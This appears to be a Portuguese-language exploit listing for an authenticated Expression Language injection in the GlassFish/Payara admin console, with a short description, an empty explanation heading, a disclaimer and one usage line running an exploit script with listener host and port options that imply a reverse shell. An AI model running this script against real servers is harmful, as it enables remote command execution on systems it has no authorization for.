
Exploit de injeção EL autenticada no console administrativo GlassFish/Payara permitindo execução remota de comandos através de parâmetros manipulados no fluxo de configuração do servidor virtual.
Uma vulnerabilidade de Injeção de Expression Language no Console de Administração do GlassFish permite que um usuário autenticado injete expressões EL maliciosas em parâmetros processados pela interface web administrativa. A exploração bem-sucedida pode levar à execução remota de comandos no servidor afetado.
A vulnerabilidade foi identificada no fluxo de edição da configuração virtual do servidor, onde parâmetros controláveis pelo usuário são interpretados de forma insegura pela aplicação.
Isso ocorre porque:
O teste foi realizado em um ambiente local e controlado.
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure
URL vulnerável:
APENAS PARA USO AUTORIZADO. A DeepSecurity Perú não endossa acesso não autorizado e não se responsabiliza por qualquer uso indevido das informações fornecidas.